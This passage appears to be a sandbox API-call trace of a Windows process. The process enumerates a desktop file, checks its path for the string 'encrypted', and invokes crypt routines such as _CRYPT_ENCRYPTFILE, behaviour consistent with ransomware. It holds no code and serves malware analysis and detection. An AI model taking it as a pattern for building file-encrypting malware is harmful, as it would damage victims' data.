HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x54c02d10, ftLastWriteTime.dwHighDateTime=0x1d5b9fe, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x0, dwReserved1=0x777648, cFileName="b9ol1.avi", cAlternateFileName="")) returned 0x7c20c0 [0031.365] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.366] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x54c02d10, ftLastWriteTime.dwHighDateTime=0x1d5b9fe, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x0, dwReserved1=0x777648, cFileName="b9ol1.avi", cAlternateFileName="")) returned 0x7c20c0 [0031.366] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ol1.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.368] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.368] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.368] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.369] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.369] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.369] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.369] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.369] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x54c02d10, ftLastWriteTime.dwHighDateTime=0x1d5b9fe, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="b9ol1.avi", cAlternateFileName="")) returned 0x7c2240 [0031.369] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.369] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.369] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0031.369] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.370] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.370] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.370] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.370] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.370] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.370] PeekMessageW (in: 